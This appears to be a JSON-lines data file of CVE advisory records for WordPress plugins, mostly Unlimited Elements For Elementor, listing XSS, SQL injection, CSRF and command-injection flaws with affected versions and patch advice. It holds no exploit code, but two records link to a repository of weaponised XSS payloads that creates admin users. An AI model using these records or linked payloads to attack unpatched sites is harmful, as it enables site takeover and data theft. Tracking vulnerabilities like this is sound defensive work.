{"CVE_ID":"CVE-2025-1663","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.142","versionEndExcluding":"1.5.143","description":"The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 1.5.142 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.143, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258648%40unlimited-elements-for-elementor&new=3258648%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3258648%40unlimited-elements-for-elementor&new=3258648%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d07c43e0-783a-499b-b172-d058583d0749?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d07c43e0-783a-499b-b172-d058583d0749?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36743","slug":"post-type-x","versionEndExcluding":"1.5.13","description":"The Product Catalog Simple plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.13. This is due to missing or incorrect nonce validation on the implecode_save_products_meta() function. This makes it possible for unauthenticated attackers to update product meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e098fe-d1f9-4c8f-ae6b-222cbd5976b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e098fe-d1f9-4c8f-ae6b-222cbd5976b2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368377\\\/post-type-x\\\/trunk\\\/core\\\/includes\\\/register-product.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368377\\\/post-type-x\\\/trunk\\\/core\\\/includes\\\/register-product.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10784","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.126","versionEndExcluding":"1.5.127","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018Tile Gallery' widget in all versions up to, and including, 1.5.126 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.127, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185683%40unlimited-elements-for-elementor&new=3185683%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185683%40unlimited-elements-for-elementor&new=3185683%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0149ae49-5d40-4431-9612-04182afce2ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0149ae49-5d40-4431-9612-04182afce2ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6171","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 1.5.112 due to insufficient IP address validation and\/or use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers  to bypass antispam functionality in the Form Builder widgets.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/714acd7d-6d19-4087-bb27-b9a4ccbb678b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/714acd7d-6d19-4087-bb27-b9a4ccbb678b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_form.class.php#L742\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_form.class.php#L742\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/functions.class.php#L3407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/functions.class.php#L3407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6170","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018email\u2019 parameter in all versions up to, and including, 1.5.112 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db14b141-521b-464d-a638-2228b1a86c2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db14b141-521b-464d-a638-2228b1a86c2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php#L398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php#L398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"name\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6169","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018username\u2019 parameter in all versions up to, and including, 1.5.112 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above and granted plugin setting edit permissions by an administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2f11c32-d58e-4ac8-83c7-30927a626e10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f2f11c32-d58e-4ac8-83c7-30927a626e10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L178\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/framework\\\/instagram\\\/helper.class.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"name\":\"https:\\\/\\\/github.com\\\/hakluke\\\/weaponised-XSS-payloads\\\/blob\\\/master\\\/wordpress_create_admin_user.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6166","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.112","versionEndExcluding":"1.5.113","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018addons_order\u2019 parameter in all versions up to, and including, 1.5.112 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above and granted plugin setting edit permissions by an administrator, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.113, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9826c91c-0f6e-4d3b-bc14-4af6b60ef246?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9826c91c-0f6e-4d3b-bc14-4af6b60ef246?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112307\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10638","slug":"aco-product-labels-for-woocommerce","versionImpact":"1.5.10","versionEndExcluding":"1.5.11","description":"The Product Labels For Woocommerce (Sale Badges) WordPress plugin before 1.5.11 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 1.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a7a778-2211-45b4-bdc2-528f27b7d4fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13510","slug":"shopsite-plugin","versionImpact":"1.5.10","versionEndExcluding":"1.5.11","description":"The ShopSite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.10. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226553%40shopsite-plugin%2Ftrunk&old=3139879%40shopsite-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226553%40shopsite-plugin%2Ftrunk&old=3139879%40shopsite-plugin%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2fde092-0a12-42ab-abbb-7f5ff5de9af2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2fde092-0a12-42ab-abbb-7f5ff5de9af2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4779","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.107","versionEndExcluding":"1.5.108","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to SQL Injection via the \u2018data[post_ids][0]\u2019 parameter in all versions up to, and including, 1.5.107 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.108, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b155f8ca-9d09-47d7-a7c2-7744df029c19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b155f8ca-9d09-47d7-a7c2-7744df029c19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090199\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/functions_wordpress.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3090199\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/functions_wordpress.class.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3190","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.107","versionEndExcluding":"1.5.108","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's text field widget in all versions up to, and including, 1.5.107 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Please note that this vulnerability is different in that the issue stems from an external template. It appears that older versions may also be patched because of this; however, 1.5.108 is listed as the patched version since it is the most recent version containing a known patch.","recommendation":"Update to version 1.5.108, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d8ddc9-69ad-4d69-ac23-5a31dfeafd54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78d8ddc9-69ad-4d69-ac23-5a31dfeafd54?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090199%40unlimited-elements-for-elementor&new=3090199%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3090199%40unlimited-elements-for-elementor&new=3090199%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3055","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.102","versionEndExcluding":"1.5.105","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in all versions up to, and including, 1.5.102 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.105, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081509%40unlimited-elements-for-elementor%2Ftrunk&old=3076456%40unlimited-elements-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3081509%40unlimited-elements-for-elementor%2Ftrunk&old=3076456%40unlimited-elements-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/tags\\\/1.5.93\\\/inc_php\\\/framework\\\/db.class.php#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/tags\\\/1.5.93\\\/inc_php\\\/framework\\\/db.class.php#L238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc0c8e6-a365-4ef7-9c1a-41454855096c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc0c8e6-a365-4ef7-9c1a-41454855096c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3547","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.102","versionEndExcluding":"1.5.103","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'google_connect_error' parameter in all versions up to, and including, 1.5.102 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.103, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_settings_output.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f629fc93-84ce-4c33-b1c0-3a3194aac477?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f629fc93-84ce-4c33-b1c0-3a3194aac477?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2662","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.102","versionEndExcluding":"1.5.103","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to command injection in all versions up to, and including, 1.5.102. This is due to insufficient filtering of template attributes during the creation of HTML for custom widgets. This makes it possible for authenticated attackers, with administrator-level access and above, to execute arbitrary commands on the server.","recommendation":"Update to version 1.5.103, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_template_engine.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071404\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_template_engine.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58492dbb-b9e0-4477-b85d-ace06dba954c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58492dbb-b9e0-4477-b85d-ace06dba954c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6210","slug":"duplicator","versionImpact":"1.5.9","versionEndExcluding":"1.5.10","description":"The Duplicator plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 1.5.9. This makes it possible for unauthenticated attackers to obtain the full path to instances, which they may be able to use in combination with other vulnerabilities or to simplify reconnaissance work. On its own, this information is of very limited use.","recommendation":"Update to version 1.5.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d47d582d-7c90-4f49-aee1-03a8775b850d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d47d582d-7c90-4f49-aee1-03a8775b850d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108563\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php?old=3073248&old_path=duplicator%2Ftrunk%2Finstaller%2Fdup-installer%2Fmain.installer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3108563\\\/duplicator\\\/trunk\\\/installer\\\/dup-installer\\\/main.installer.php?old=3073248&old_path=duplicator%2Ftrunk%2Finstaller%2Fdup-installer%2Fmain.installer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48325","slug":"page-builder-add","versionEndExcluding":"1.5.1.6","description":"URL Redirection to Untrusted Site ('Open Redirect') vulnerability in PluginOps Landing Page Builder \u2013 Lead Page \u2013 Optin Page \u2013 Squeeze Page \u2013 WordPress Landing Pages. This issue affects Landing Page Builder \u2013 Lead Page \u2013 Optin Page \u2013 Squeeze Page \u2013 WordPress Landing Pages: from n\/a through 1.5.1.5.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-add\\\/wordpress-landing-page-builder-plugin-1-5-1-5-open-redirection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/page-builder-add\\\/wordpress-landing-page-builder-plugin-1-5-1-5-open-redirection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"calculator-builder","versionEndExcluding":"1.5.1","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6270","slug":"community-events","versionImpact":"1.5","versionEndExcluding":"1.5.1","description":"The Community Events WordPress plugin before 1.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d0a6edc-61e8-42fb-8b93-ef083146bd9c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d0a6edc-61e8-42fb-8b93-ef083146bd9c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3919","slug":"openpgp-form-encryption","versionImpact":"1.5.0","versionEndExcluding":"1.5.1","description":"The OpenPGP Form Encryption for WordPress plugin before 1.5.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e38c7d9-5b6a-4dfc-8f22-3ff30565ce43\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e38c7d9-5b6a-4dfc-8f22-3ff30565ce43\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
